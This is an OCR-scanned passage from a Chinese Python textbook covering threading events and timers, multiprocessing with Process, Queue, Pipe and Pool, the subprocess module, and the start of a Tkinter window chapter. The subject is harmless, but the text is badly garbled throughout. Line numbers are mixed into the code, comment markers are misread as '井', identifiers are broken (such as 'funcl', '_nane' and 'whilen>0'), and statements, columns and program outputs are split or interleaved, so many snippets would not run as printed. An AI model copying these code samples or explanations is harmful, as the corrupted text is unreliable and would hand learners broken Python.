5. event = threading. Event() # 创建 一 个 事件 对 象 

6. def funcl() : 

学 print("#%s 正在 运行 ……" % (threading. currentThread(). getName( ) ) ) 

8 time. sleep(6) 

9 print("event. set() 触 发 事件 ") 

10. event. set() # 设 置 事件 标记 为 True 

人 

12. def func2(): 

而 event. wait() # 阻 塞 线程 直至 事件 对 象 的 内 置 标记 被 设置 为 True 
14. print(" 名 s 运行 了 …… "% (threading. currentThread( ). getName( ))) 

是 本 > 

16. def main(): 

17. event. clear() 井 调 用 clear() 将 event 标记 设置 为 False, 其实 标记 本 来 就 是 False 
18. print("event 标记 状态 : ", event. isSet()) # 输 出 event 标记 状态 
19. tl1 = threading. Thread(target = funcl) 

20. t1. start() 

2 t2 = threading. Thread(target = func2) 

22, t2. start() 

23, t1. join() 

24. t2. join() 
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2 main( ) 
程序 执行 结果 : 


event 标记 状态 : False 
Thread 一 1 正在 运行 …… 
event. set( ) 触 发 事件 


二 说 明 : 第 6 一 10 行 ,定义 函 束 func10 ,该 函数 运行 后 ,会 休 肯 6s。 

第 12 一 14 行 ,定义 函数 func2(), 因 event 事件 标记 为 False, 线 程 会 被 阻塞 。 

第 13 行 ,event. wait() 至 使 该 线程 运行 受阻 ,直至 6s 后 ,funcl 线程 执行 了 event. set() ,将 
事件 标记 设置 为 True ,func2 线程 才 执 行 并 返回 。 

6. 定时 执行 任务 

在 实际 的 编程 实践 中 ,有 时 需要 定时 执行 某 任务 ,或 者 周期 性 地 执行 某 任务 。 这 时 就 用 
到 了 threading. Timer 类 ,该 类 是 Thread 类 派生 出 来 的 ,其 用 法 如 下 : 

timer = threading.Timer( 指 定时 间 , 函数 ) 

timer. start() 

这 两 条 语句 的 意思 是 在 指定 的 时 间 后 ,执行 函数 。 有 了 Timer 类 ,就 可 以 周期 性 地 执 
行 某 个 任务 了 。 当 然 ,Timer 类 还 有 cancel() 方 法 取消 Timer 类 的 执行 动作 。 下 面 的 例子 
演示 了 让 程序 每 1s 显示 一 下 系统 时 间 ,30s 后 退出 的 功能 。 

例 [thread_timer. py】 

#coding:utf -8 


from threading import Timer 
import time 


global timer 


1 
2 

区 

4 

5. def delayrun( ) : 
6 

当 strtime = time. strftime("%H:%M:%S") # 取 得 本 机 时 间 的 字符 串 形式 
8 

9 


print(strtime) 

timer = Timer(1,delayrun) 井 再 创建 一 个 Timer 对 象 赋值 给 timer 
10. timer. start() 井 启 动 Timer 对 象 
4 
12. timer = Timer(2, delayrun) # 指 定 2s 后 ,执行 delayrun( ) 函 数 
13. timer. start() 井 启动 Timer 
14. time. sleep(30) 
15. timer.cancel() 井 取消 Timer 的 执行 


(本 说 明 : 第 5 一 10 行 ,定义 了 画 教 delayrun() , 它 的 作用 就 是 显示 本 机 时 间 。 

第 12 行 , 创 建 Timer 对 象 ,指定 2s 后 执行 delayrun() 函 数 ,注意 : 这 里 的 delayrun() 函 
数 不 带 括号 表示 是 函数 对 象 。 

需要 说 明 的 是 : delayrun() 函 数 中 如 果 没 有 第 9 行 、. 第 10 行 ,delayrun() 函 数 只 会 在 
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程序 执行 2s 后 执行 一 次 ,而 不 会 周期 性 地 执行 。 第 10 行 指定 1s 后 ,调用 delayrun() 函数 
自己 ,这样 就 可 以 实现 周期 性 执行 delayrun() 函 数 了 。 回 第 9 行 与 第 12 行 timer 中 的 时 间 
间隔 可 以 是 不 同 的 ,单位 是 s, 可 以 是 整数 ,也 可 以 是 小 数 。 


7.2 多 进程 编程 


7.2.1 多 进程 的 创建 


Python 的 线程 虽然 是 真正 的 线程 ,但 解释 器 中 有 一 个 GIL(Global Interpreter Lock) 
锁 , 任 何 Python 线程 执行 前 ,必须 先 获 得 GIL 锁 , 然 后 ,每 执行 100 条 字 节 码 , 解 释 器 就 会 
自动 释放 GIL 锁 , 让 别 的 线程 有 机 会 执行 。 这 个 GIL 全 局 锁 实际 上 把 所 有 线程 的 执行 代码 
都 给 上 了 锁 ,因此 ,多 线程 在 Python 中 是 交替 执行 的 ,即使 100 个 线程 跑 在 100 核 CPU 上 ， 
也 只 能 用 到 1 个 核 。 

如 果 想 要 充分 地 使 用 多 核 CPU 的 资源 ,在 Python 中 大 部 分 情况 需要 使 用 多 进程 。 
Python 提供 了 非常 好 用 的 多 进程 包 multiprocessing, 只 需 定义 一 个 函数 ,Python 会 帮助 完 
成 其 他 所 有 事情 。multiprocessing 提供 了 Process、Queue、Pipe、Lock 等 组 件 支 持 子 进程 ， 
通信 和 共享 数据 ,执行 不 同形 式 的 同步 。 

multiprocessing 模块 提供 了 一 个 Process 类 来 代表 一 个 进程 对 象 , 其 语法 格式 如 下 : 


Process([group [, target [，name [, args [, kwargs]]]]]) 


target 表示 调用 对 象 ; args 表示 调用 对 象 的 参数 元 组 ; kwargs 表示 调用 对 象 的 字典 ; 
name 为 别名 ; group 实质 上 不 使 用 。 
Process 类 中 的 常见 方法 与 属性 如 表 7-2 所 示 。 


表 7-2 Process 类 中 的 常见 方法 与 属性 














方法 或 属性 描 述 
authkey 进程 的 认证 密 钥 ( 字 节 字符 串 ) 
daemon 进程 的 守护 进程 标志 ,一 个 布尔 值 。 必 须 在 start() 方 法 之 前 设置 
exitcode 子 进程 的 退出 代码 
is_alive() 进程 是 否 存活 





如 果 可 选 参数 timeout 为 None( 默 认 值 ), 则 该 方法 将 阻塞 ,直到 调用 join() 方 法 的 进 
程 终止 。 如 果 超 时 是 正 数 , 它 将 阻止 最 多 超时 秒 数 


join([timeout]) 




















name 进程 的 名 称 

pid 返回 进程 ID 

run() 表示 进程 活动 的 方法 
start() 启动 某 个 进程 
terminate() 终止 进程 


1. Process 调用 函数 ,实现 多 进程 并 行 执行 
Process 实例 中 target 表示 将 要 调用 的 函数 ,args 表示 传 给 调用 函数 的 参数 ,参数 为 元 
组 , 若 元 组 仅 有 一 个 元 素 , 则 用 类 似 “(2,) ”的 方式 表示 。 


例 [process_func. py】 


37, 


#coding:utf -8 
import multiprocessing 


import time 


def process 1(secs): 
print("process 1") 
time. sleep( secs) 
print("process_1 运行 结束 ") 


. def process 2(secs): 


print("process 2") 
time. sleep( secs) 


print("process_2 运行 结束 ") 


. def process 3(secs): 


print("process_3") 
time. sleep( secs) 


print("process_3 运行 结束 ") 


if _name == " main_": 
pl = multiprocessing. Process(target 
p2 = multiprocessing. Process(target 


p3 = multiprocessing. Process(target 


pl. start() 
p2. start() 
p3. start() 





process_1, args = (2,)) 
process_2, args = (3,)) 
process_3, args = (4,)) 


print("CPU 的 内 核 数 为 : " + str(multiprocessing. cpu_count())) 
for p in multiprocessing. active_children( ): 
print(" 子 进行 名 : "+ p.name + "\t p.id:"+str(p.pid)) 


pl. join() 
p2. join() 
p3. join() 


print(" 运 行 结束 ") 


程序 运行 结果 ( 需 在 命令 行 下 执行 ,在 IDLE 下 运行 不 会 出 现 此 结果 ): 


> python process_func.py 


CPU 的 内 核 数 为 : 4 

子 进行 名 : Process -3 p. id:16864 
子 进行 名 : Process 一 1 p. id:16772 
子 进行 名 : Process 一 2 p. id:16476 
process_ 3 


process 2 

process 1 
process_1 运行 结束 
process_2 运行 结束 
process_3 运行 结束 
运行 结束 


2. 定义 类 ,实现 多 进程 并 行 运行 
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首先 定义 类 ,该 类 继承 自 multiprocessing. Process 类 ,类 中 覆 写 _init_0O 〇 方法 和 run() 


例 [process_class. py】 


1 #coding:utf—8 

2 import multiprocessing 

3 import time 

4 

5. class MyProcess(multiprocessing.Process): 

6 def init (self, interval): 

7 multiprocessing. Process._ init (self) 
8 self. interval = interval 

9, def run(self): 

10, n=5 

Fh whilen>0: 

12. print(" 现 在 是 {0} ,进程 {1} 正 在 运行 


S"), multiprocessing. Process. pid)) 


1 time. sleep( self. interval) 
14. n-=1 

9s 

16. if name == " main _": 

17. pl = MyProcess(1) 

18. p2 = MyProcess(2) 

19. print(" 现 在 是 {} ,所 有 进程 开始 运行 …… 
20. pl. start() 

21. p2. start() 

22. pl. join() 

23. p2. join() 

24. 


程序 运行 结果 (命令 行 提示 符 下 ): 
> python process_class.py 


现在 是 17:44:13, 所 有 进程 开始 运行 
现在 是 17 
现在 是 17 
现在 是 17 
现在 是 17 


方法 ,_init_0O 〇 方法 实现 初始 化 功能 ,runO 〇 方法 中 包含 着 进程 中 执行 的 代码 。 


# 调 用 父 类 的 _init_() 方 法 


". format(time. strftime("%H:%M:% 


# 创建 MyProcess 类 实例 , interval 为 1 


".format(time. strftime(" % H: %M:%S"))) 


# 启动 进程 


# 等 待 进程 结束 


print(" 现 在 是 {} ,所 有 进程 运行 结束 ". format(time. strftime("%H: %M: %S"))) 


:44:13, 进 程 < property object at 0x00000000025CE598 > 正在 运行 …… 
:44:13, 进 程 < property object at 0x000000000258E598 > 正在 运行 
:44:14, 进 程 < property object at 0x00000000025CE598 > 正在 运 
:44:15, 进 程 < property object at 0x000000000258E598 > 正在 运行 
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现在 是 17:44:15 ,进程 < property object at 0x00000000025CE598 > 正在 运行 …… 
现在 是 17:44:16, 进 程 < property object at 0x00000000025CE598 > 正在 运行 …… 
现在 是 17:44:17 ,进程 < property object at 0x000000000258E598 > 正在 运行 
现在 是 17:44:17 ,进程 < property object at 0x00000000025CE598 > 正在 运行 
现在 是 17:44:19 ,进程 < property object at 0x000000000258E598 > 正在 运行 …… 
现在 是 17:44:21, 进 程 < property object at 0x000000000258E598 > 正在 运行 …… 
现在 是 17:44:24, 所 有 进程 运行 结束 





当 多 个 进程 访问 临界 资源 时 ,有 可 能 会 引起 进程 安全 问题 ,对 进程 安全 问题 的 处 理 , 在 
Python 进程 编程 中 的 处 理 方法 与 线程 处 理 有 些 类 似 , 主 要 有 和 锁 机 制 (multiprocessing. Lock 
()) ,信号 量 (multiprocessing. Semaphore(n))、 事 件 (multiprocessing. Event())。 这 里 就 不 
青 效 述 , 请 参见 本 书 示例 代码 。 


7.2.2 进程 间 数 据 的 传递 


多 进程 间 进行 数据 传递 时 ,可 以 使 用 队列 (multiprocessing. Queue()) 和 管道 (Pipe) 。 

1. 使 用 Queue 传递 数据 

Queue 是 多 进程 安全 的 队列 ,可 以 使 用 Queue 实现 多 进程 之 间 的 数据 传递 。put( ) 方 
法 用 以 插入 数据 队列 中 ,put() 方 法 还 有 两 个 可 选 参数 : blocked 和 timeout。 如 果 blocked 
为 True( 默 认 值 ) ,并 且 timeout 为 正 值 ,该 方法 会 阻塞 timeout 指定 的 时 间 , 直 到 该 队列 有 
剩余 的 空间 。 如 果 超 时 ,会 抛 出 Queue. Full 异常 。 如 果 blocked 为 False, 但 该 Queue 已 
满 ,会 立即 抛 出 Queue. Full 异常 。 

get() 方 法 可 以 从 队列 读 取 并 且 删 除 一 个 元 素 。 同 样 , get() 方 法 有 两 个 可 选 参数 : 
blocked 和 timeout。 如 果 blocked 为 True( 默 认 值 ) .并且 timeout 为 正 值 ,那么 在 等 待 时 间 
内 没有 取 到 任何 元 素 , 会 抛 出 Queue. Empty 异常 。 如 果 blocked 为 False, 有 两 种 情况 存 
在 , 若 Queue 有 一 个 值 可 用 , 则 立即 返回 该 值 ; 否则 , 若 队 列 为 空 , 则 立即 抛 出 Queue. 
Empty 异常 。 

例 [process_queue. py】 
#coding:utf -8 
import multiprocessing 


from random import randint 
import time 


def writer proc(q): 
for i in range(5): 
try: 
q.put(randint(1,100), block = False) 
10. except: 
I pass 井 忽视 异常 


13. def reader proc(q): 

14. while not q. empty() : # 判 断 队列 是 否 为 空 
号 try: 

16. print(" 获 取 到 : "，q. get(block = False)) 
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7 except: 
18. print(" 产 生 异 常 ") 井 忽视 异常 
19. print(" 队 列 已 空 ") 
20. 
21. if _nane == " main ": 
32 q = multiprocessing. Queue(10) # 创 建 长 度 为 10 的 队列 
23， writer = multiprocessing.Process(target = writer proc, args = (qv )) 
井 进程 调用 writer_proc( ) 函数 
24. writer. start() 井 启动 进程 
号 3 
26. #time. sleep(2) 井 偶尔 有 reader_proc 先 运行 , 读 不 到 数据 ,进程 退出 情况 出 现 
内 
28. reader = multiprocessing.Process(target = reader proc, args = (gq,)) 
# 进程 调用 reader_proc( ) 函数 
295 reader. start() 井 启动 进程 
30. 
reader. join() # 等 待 进程 结束 
3 writer. join() 


2. 管道 (Pipe) 传 递 数据 


pipe() 方 法 返回 (conn1, conn2) 代 表 一 个 管道 的 两 个 端 。pipe() 方 法 有 duplex 参数 ， 
如 果 duplex 参数 为 True( 默 认 值 ) ,那么 这 个 管道 是 全 双 工 模式 ,也 就 是 说 connl 和 conn2 
均 可 收发 ; 如 果 duplex 为 False,connl 只 负责 接收 消息 ,conn2 只 负责 发 送 消息 。 

send() 方 法 和 recv() 方 法 分 别 是 发 送 消息 与 接收 消息 的 方法 。 例 如 ,在 全 双 工 模式 下 ， 
可 以 调用 connl. send() 发 送 消息 ,connl. recv() 接 收 消息 。 如 果 没 有 消息 可 接收 ,recv() 方 
法 会 一 直 阻 塞 。 如 果 管 道 已 经 被 关闭 ,那么 recv() 方 法 会 抛 出 EOFError 异常 。 

例 [process_pipe. py】 

井 coding:utf 一 8 


import multiprocessing 
import time 


for i in range(10) : 
Print("send: %s"” %(i)) 
pipe. send(i) 


1 
2 
3 
4 
5. def procl(pipe) : 
6 
7 
8 
9 time. sleep(1) 


11. def proc2(pipe): 
12, while True: 
13, print("proc2 rev:", pipe. recv()) 
14. time. sleep(1) 
5 
16. if name == " main ": 
i pipe = multiprocessing. Pipe() # 创 建 默 认 的 双 工 管道 
18. pl = multiprocessing.Process(target = procl, args= (pipe[0],)) 
# 进程 调用 proc1( ) 函数 
9; p2 = multiprocessing.Process(target = proc2, args = (pipe[1],)) 


# 进程 调用 proc2() 函数 
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26. 


pl. start() 井 启动 进程 

p2. start() 

pl1. join() # 等 待 进程 结束 

p2. terminate( ) #p2 进程 里 是 死 循 环 ,无 法 等 待 其 结束 ,只 能 强行 终止 


print(" 进 程 都 结束 了 ") 


Queue 和 Pipe 的 区 别 : Pipe 用 来 在 两 个 进程 间 通 信 ,Queue 用 来 在 多 个 进程 间 实现 通信 。 
7.2.3 进程 池 


在 利用 Python 进行 系统 管理 时 ,特别 是 同时 操作 多 个 文件 目录 ,或 者 远程 控制 多 台 
机 ,并 行 操作 可 以 节约 大 量 的 时 间 。 当 被 操作 对 象 数目 不 大 时 ,可 以 直接 利用 
multiprocessing 中 的 Process 动态 生成 多 个 进程 ,十 几 个 还 好 ,但 如 果 是 上 百 个 、 上 千 个 目 
标 , 手 动 地 去 限制 进程 数量 却 又 太 过 烦琐 ,此 时 可 以 发 挥 进程 池 的 功效 。 

pool 可 以 提供 指定 数量 的 进程 ,供用 户 调用 , 当 有 新 的 请 求 提交 到 pool 中 时 ,如 果 池 还 
没有 满 ,那么 就 会 创建 一 个 新 的 进程 用 来 执行 该 请 求 ; 但 如 果 池 中 的 进程 数 已 经 达到 规定 
最 大 值 ,那么 该 请 求 就 会 等 待 ,直到 池 中 有 进程 结束 , 才 会 创建 新 的 进程 来 处 理 它 。 

例 Kprocess_pool. py】 


. if name == 


井 coding: utf—8 
import multiprocessing 
import time 

import os 


def func(name) : 


print("%s %s 正在 运行 ……" % (name,os.getpid())) ## 显示 进程 名 与 进程 id 
time. sleep(3) 

print("%s 执行 结束 " % name) 

"_main_": 

pool = multiprocessing. Pool(processes = 3) # 创 建 一 个 进程 池 , 进程 数 为 3 
for i in range(4) : 


name = “" 子 进程 %d" % (i) # 生 成 字符 串 : 进程 名 
pool.apply_async(func，(name，) ) # 非 阻塞 执行 
#pool.apply(func, (name, )) 井 阻塞 执行 


print(" 父 进程 id 为 : %s"%os.getpid()) 

pool.close() 

pool. join() 井 调用 join 之 前 , 先 调用 close( ) 函数 ,否则 会 出 错 
print(" 所 有 子 进程 执行 完毕 ") 


(和 本 说 明 : 第 6~9 行 ,定义 一 个 函数 ,执行 时 ,显示 进程 名 和 进程 id。 

第 12 行 , 创 建 一 个 进程 池 , 通 过 processes 指定 进程 个 数 。 

第 13 一 16 行 ,生成 4 个 进程 ,pool. apply_async(funcL ,argsL, kwdsL，callback]]]) 为 
非 阻塞 执行 (一 个 进程 执行 时 不 会 等 待 前 一 个 进程 结束 ), pool. apply (func[，args 
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[, kwds]]) 为 阻塞 执行 。 维持 执行 的 进程 总 数 为 processes, 当 一 个 进程 执行 完毕 后 会 添加 
新 的 进程 进去 。 

第 19 行 ,关闭 pool, 使 其 不 再 接受 新 的 任务 。 

第 20 行 , 主 进程 阻塞 ,等 待 子 进程 的 退出 ,执行 完 close 后 不 会 有 新 的 进程 加 入 pool， 
join 〇 方法 等 待 所 有 子 进程 结束 ,注意 : join() 方 法 要 在 close 或 terminate 之 后 使 用 。 

非 阻 塞 运行 结果 : 


> python process_pool.py 


父 进 程 id 为 : 4536 

子 进程 0 17472 正在 运行 …- 
子 进 程 1 14444 正在 运行 …… 
子 进 程 2 17968 正在 运行 … 
子 进程 0 执行 结束 

子 进程 3 17472 正在 运行 … 
子 进程 1 执行 结束 

子 进程 2 执行 结束 

子 进程 3 执行 结束 

所 有 子 进程 执行 完毕 


阻塞 运行 结果 : 
> python process_pool.py 


子 进 程 0 6396 正在 运行 …… 
子 进程 0 执行 结束 

子 进程 1 10860 正在 运行 …… 
子 进 程 1 执行 结束 

子 进程 2 16692 正在 运行 …… 
子 进 程 2 执行 结束 

子 进程 3 6396 正在 运行 …… 
子 进程 3 执行 结束 

父 进 程 id 为 : 13096 

所 有 子 进程 执行 完毕 


7.2.4 于 进程 

在 编程 中 ,经 常 需要 调用 其 他 程序 ,并 且 要 捕获 程序 的 输入 /输出 。 这 时 就 可 以 用 到 
subprocess 模块 。 

1. subprocess.call() 函 数 

使 用 subprocess. call() 函数 可 以 创建 进程 ,执行 命令 ,返回 状态 码 ( 命 令 正常 执行 返回 
0 ,报错 则 返回 1) ,使 用 方法 如 下 : 


import subprocess 
r = subprocess.call("dir", shell = True,cwd = 'c:\\') 并 shell 为 False 时 命令 必须 分 开 写 
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井 = subprocess.call(["notepad. exe","c:\\log. txt"]) 井 运行 记事 本 ,打开 指定 的 文件 
#r = subprocess.call(["ping", "wuw. baidu. com"]) 井 执行 ping 命令 
print("ret code:",r) 


2. check_call() 函 数 
执行 命令 ,如果 执行 成 功 , 则 返回 状态 码 0; 否则 抛 出 异常 。 


r = subprocess.check call(["ping","www.baidu.com"]) 
print("ret code:",r) 


3. check_output( 〇 函数 
执行 命令 ,如 果 执 行 成 功 , 则 返回 执行 结果 ; 否则 抛 出 异常 。 


r = subprocess. check_output(["ping","www.baidu.com"]) 
print(r. decode( 'GBK')) 井 Linux 下 应 改 为 : print(r. decode( 'UTF - 8')) 


在 Windows 平台 下 ,程序 运行 结果 : 


正在 Ping www.a. shifen.com [111.13.100.91] 具有 32B 的 数据 : 

来 自 111.13.100.91 的 回复 : 字 节 = 32 时 间 = 27ms TIL=54 

来 自 111.13.100.91 的 回复 : 字 节 = 32 时 间 = 27ms TTL = 54 

来 自 111.13.100.91 的 回复 : 字 节 = 32 时 间 = 28ms TIL = 54 

来 自 111.13.100.91 的 回复 : 字 节 = 32 时 间 = 27ms TITL = 54 

111.13.100.91 的 Ping 统计 信息 : 
数据 包 : 已 发 送 = 4, 已 接收 = 4, 丢 失 = 0 (0% 丢失 ), 往 返 行程 的 估计 时 间 ( 以 ms 为 单位 ) : 
最 短 = 27ms, 最 长 = 28ms, 平 均 = 27ms 


4. subprocess. Popen(...) 

用 于 执行 复杂 的 系统 命令 ,其 参数 说 明 如 下 。 

9 args: 可 以 是 字符 串 或 者 序列 类 型 (如 list\tuple) 。 默 认 的 、 要 执行 的 程序 应 该 是 序 
列 的 第 一 个 字段 ,如 果 是 单个 字符 串 , 它 的 解析 依赖 于 平台 。 在 UNIX 中 ,如 果 args 
是 一 个 字符 串 ,那么 这 个 字符 串 解释 成 被 执行 程序 的 名 字 或 路 径 ,然而 ,这 种 情况 只 
能 用 在 不 需要 参数 的 程序 。 

9 bufsieze: 指 定 缓冲 。0 表示 无 缓冲 ,1 表示 缓冲 ,任何 其 他 的 整数 值 表 示 缓 冲 大 小 ， 
负数 值 表示 使 用 系统 默认 缓冲 ,通常 表示 完全 缓冲 。 默 认 值 为 0 即 没有 缓冲 。 

2 stdin stdout stderr: 分 别 表示 程序 的 标准 输入 、 输 出 、 错 误 句 柄 。 

9 preexec_fn: 只 在 UNIX 平台 有 效用 于 指定 一 个 可 执行 对 象 , 它 将 在 子 进 程 中 运行 
之 前 被 调用 。 

0 close_fds: 在 Windows 平台 下 ,如果 close_fds 被 设置 为 True, 则 新 创建 的 子 进程 将 
不 会 继承 父 进 程 的 输入 、 输 出 、 错 误 管 道 。 所 以 不 能 将 close_fds 设置 为 True 同时 
重 定向 子 进 程 的 标准 输入 、 输 出 与 错误 。 

9 shell: 默 认 值 为 False, 声 明了 是 否 使 用 shell 来 执行 程序 ,如 果 shell= 王 True: 它 将 
args 看 作 一 个 字符 串 , 而 不 是 一 个 序列 。 在 UNIX 操作 系统 , 且 shell 二 True 时 ， 
shell 默认 使 用 /bin/sh。 

2 cwd: 用 于 设置 子 进程 的 当前 目录 。 当 它 不 为 None 时 , 子 程序 在 执行 前 , 它 的 当前 
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路 径 会 被 替换 成 cwd 的 值 。 这 个 路 径 并 不 会 被 添加 到 可 执行 程序 的 搜索 路 径 , 所 以 
cwd 不 能 是 相对 路 径 。 

2 env: 用 于 指定 子 进程 的 环境 变量 。 如 果 env 二 None, 子 进程 的 环境 变量 将 从 父 进 程 
中 继承 。 当 它 不 为 None 时 , 它 是 新 进程 的 环境 变量 的 映射 。 可 以 用 它 来 代替 当前 
进程 的 环境 。 

9 _ universal_newlines: 不 同系 统 的 换行 符 不 同 , 文 件 对 象 stdout 和 stderr 都 被 以 文本 
文件 的 方式 打开 。 

9 startupinfo 与 createionflags: 只 在 Windows 平台 下 生效 。 将 被 传递 给 底层 的 
CreateProcess() 函数 ,用 于 设置 子 进程 的 一 些 属性 ,如 主 窗口 的 外 观 、 进 程 的 优先 
级 等 。 

例如 : 


import subprocess 


obj = subprocess. Popen ([ " ping"," www. baidu. com"], stdin = subprocess. PIPE， stdout = 
subprocess. PIPE, stderr = subprocess.PIPE, shell = False) 

obj. stdin. write(b" -mn4") 

obj. stdin. close( ) 

output = obj. stdout.read() 

obj. stdout. close() 

print("output:", output. decode('GBK') ) 


程序 运行 结果 : 


正在 Ping www.a. shifen. com [111.13.100.92] 具有 32B 的 数据 : 

来 自 111.13.100.92 的 回复 : 字 节 = 32 时 间 = 105ms TTL = 54 

来 自 111.13.100.92 的 回复 : 字 节 = 32 时 间 = 102ms TTL = 54 请 求 超时 。 

来 自 111.13.100.92 的 回复 : 字 节 = 32 时 间 = 28ms TTL = 54111.13.100.92 的 Ping 统计 信息 : 
数据 包 : 已 发 送 = 4, 已 接收 = 3, 丢 失 = 1 (25% 丢失 ) ,往返 行程 的 估计 时 间 ( 以 ms 为 单位 ) : 
最 短 = 28ms, 最 长 = 105ms, 平 均 = 66ms 


也 可 以 使 用 以 下 方法 对 执行 进程 进行 输入 /输出 : 
例 [subproc. py】 


#coding:utf 一 8 

import subprocess 

obj = subprocess.Popen(["python"], stdin= subprocess. PIPE，stdout = subprocess. PIPE, stderr 
= subprocess. PIPE, universal newlines = True) 

output, error = obj.communicate('print("hello")') ## communicate(' 输 入 内 容 '),output 为 输出 内 容 
print(" 输 出 信息 :",output) 

print(" 错 误 代码 : ", error) 


程序 运行 结果 : 
> python subproc.py 


输出 信息 : hello 
错误 代码 : 
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简 答 题 

. 实现 多 任务 编程 有 何 好 处 ? 

. 简 述 多 线程 编程 的 两 种 实现 方式 。 

. 简 述 多 进程 编程 的 两 种 实现 方式 。 

. 多 线程 间 是 如 何 实现 同步 与 通信 的 ? 

. 简 述 多 进程 间 数据 传递 的 方式 。 

. 简 述 进程 池 的 作用 及 实现 方法 。 

.subprocess 模块 运行 子 进程 时 ,如 何 捕获 输入 与 输出 ? 


~ 中 上 oo 


8.1 Python 图 形 界面 工具 集 简介 


图 形 化 用 户 界面 应 用 程序 是 一 种 非常 常见 的 类 型 ,为 了 设计 图 形 化 应 用 程序 ,需要 一 种 
图 形 化 用 户 界面 开发 工具 包 ,Python 目前 主要 有 以 下 几 种 GUI 开发 工具 包 。 

2 Tkinter: Tkinter 是 Python 自 带 的 一 种 跨 平台 的 图 形 化 用 户 界面 开发 工具 箱 ， 
Python 的 IDLE 就 是 用 Tkinter 开发 出 来 的 , 跨 平台 性 是 它 最 显著 的 特点 ,在 一 些小 
型 的 应 用 软件 开发 上 Tkinter 是 非常 有 用 的 ,但 由 于 该 软件 包 功 能 较 弱 ,因此 ， 
Tkinter 不 用 于 较 复 杂 界 面 应 用 程序 的 设计 。 

9 PyGTK: GTK 是 开源 的 图 形 化 用 户 界面 库 , 它 是 用 C 语言 编写 的 ,但 使 用 了 面向 对 
象 的 思想 ,GTK 可 以 运行 于 多 个 平台 之 上 。PyGTK 是 对 GTK 的 封装 ,可 以 在 
Python 中 开发 出 GTK 界面 的 应 用 程序 ,目前 ,PyGTK 还 只 能 用 于 Python 2. x 版 
本 中 。PyGTK 的 官网 地 址 是 http://www. pygtk. org/。 

2 wxPython: wxPython 是 近 几 年 来 比较 流行 的 GUI 图 形 化 用 户 界面 开发 工具 箱 ， 
wxPython 提供 了 面向 对 象 的 编程 方式 , 它 提 供 了 大 量 的 组 件 \ 方 法 .事件 进行 界面 
的 设计 ,设计 的 框架 类 似 于 Windows 平台 下 的 MFC, 加 之 有 Boa-constructor 这 样 
的 图 形 开发 工具 ,进行 大 型 GUI 应 用 程序 设计 时 有 较 强 的 优势 ,其 官网 地 址 是 
https://wxpython. org/。 目 前 ,wxPython 已 经 支持 Python 3. x, 安 装 方法 为 二 pip 
install wxPython 。 

9 PyQt: Qt 是 一 个 跨 平 台 的 用 C++ 语言 开发 的 面向 对 象 的 图 形 化 用 户 接口 程序 库 , 可 
以 运行 于 多 个 平台 上 ,PyQt 是 对 Qt 的 封装 , 它 融 合 了 Python 语言 和 Qt 库 的 优点 ， 
它 能 够 快速 地 设计 出 本 地 风格 的 类 C++ 语言 设计 的 界面 的 跨 平 台 应 用 程序 。PyQt 
的 官网 地 址 是 https://riverbankcomputing. com/。 


126) Python 编程 入 门 与 案例 详解 


8.2 Tkinter GUI 程序 编写 


尽管 Python 是 面向 对 象 的 程序 设计 语言 ,为 了 简单 易学 ,下 面 的 Tkinter 程序 都 未 使 
用 面向 对 象 的 方法 来 设计 。 

GUICGraphical User Interface ,图 形 用 户 接 口 ) 的 设计 主要 包括 下 面 几 个 步骤 。 

(1) 创建 主 窗 体 。 

(2) 创建 元 件 。 

(3) 显示 元 件 。 

(4) 进入 窗 体 的 主 循环 。 

下 面 是 一 个 简单 的 例子 。 

例 [ch8g 2_1_tk_01.py】 


1. from tkinter import * 


. root=Tk() # 创 建 主 窗 体 
3. MainLabel = Label(root, text = "Tkinter GUI, 我 很 丑 , 但 我 易学 ",font = "Times 16 bold") 
# 创建 元 件 
4. MainLabel. pack() # 显 示 元 件 
5. root.mainloop() 井 进入 窗 体 的 主 循环 


8.2.1 创建 窗口 


1. 创建 窗口 对 象 
要 创建 Tkinter 窗口 ,首先 需要 导入 Tkinter 模块 ,使 用 Tkinter 模块 可 以 方便 地 创建 
Tk 窗口 对 象 。 


root = Tk() 
2. 显示 窗口 


root.mainloop() 

mainloop() 方 法 是 进入 窗口 的 主 循环 . 侦 听 各 种 输入 /输出 事件 ,也 就 是 显示 窗口 。 

3. 设置 窗口 的 标题 

窗口 对 象 创建 后 ,可 以 使 用 title() 方 法 设置 窗口 对 象 的 标题 。 语 法 格式 如 下 : 

窗口 对 象 .title(" 窗 口 标题 ") 

如 root. title(" 窗 口 标题 ")。 

4. 设置 窗口 大 小 

创建 窗口 对 象 后 ,可 以 使 用 root. geometry(size) 方 法 设置 窗口 大 小 ,size 为 “ 宽 x 高 ”的 
字符 串 。 如 "400x200" ,中 间 为 小 写 的 字符 “x”。 命 令 如 : 





root. geometry( "400x200") 
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5. 让 窗口 居中 


(1) 要 把 窗 


方法 、winfo_screenheight() 方 法 获取 屏幕 的 宽度 和 高 度 。 
(2) 在 窗口 上 完成 其 他 部 件 的 创建 和 布局 。 


(3) 获取 窗 
取 窗 口 的 宽度 与 
(4) 计算 窗 
窗口 高 度 除 以 2 
(5) 放置 窗 
口 高 十 横 坐 标 十 
例 [ch8_2_1 


高 度 。 
口 的 放置 位 置 。 屏 幕 宽度 减 窗口 宽度 除 以 2 得 到 窗口 横 坐 标 ， 
得 到 窗口 纵 坐 标 。 





纵 坐 标 ”。 
tk_0lup.py】 


from tkinter import 关 

root = Tk() # 创 建 主 窗 体 
MainLabel = Label(root, text = "Tkinter GUI, 我 很 丑 ,但 我 易学 ",font = "Times 16 bold") 
# 创建 元 件 


root.title(" 窗 口 标题 ") 
root. resizable(False, False) 
# 设 置 窗口 不 能 改变 大 小 
. root.update() 
10，# 更 新 窗口 


11. screen width = root.winfo_ screenwidth() 


于 
3 
4 
5. MainLabel. pack() # 显示 元 件 
6 
8 
9 


12. screen height = root. winfo_screenheight() 
13， 井 获取 屏幕 宽度 和 高 度 
14. w_width= root. winfo_reqwidth( ) 


15. w_height 


= root. winfo_reqheight() 


16，# 获 取 窗口 的 宽度 和 高 度 
17， 井下 面 计算 屏幕 的 放置 位 置 
18. tmpcnf = '%dx%d+ %d+ %d'% (w width,w_ height, (screen_width - w_width)/2, (screen_ 


height - w_he 


ight ) /2) 


19. 井 计算 屏幕 的 放置 位 置 

20.， 寺 (screen_width- w_width)/2 为 窗口 距 屏 幕 左边 距 
21.， 井 (screen_height - w_height)/2 为 窗口 距 屏幕 上 边 距 
22. root. geometry(tmpcnf) 


23. root. mai 


nloop() 井 进入 窗 体 的 主 循环 


Tkinter 窗口 创建 示例 如 图 8-1 所 示 。 


ee 





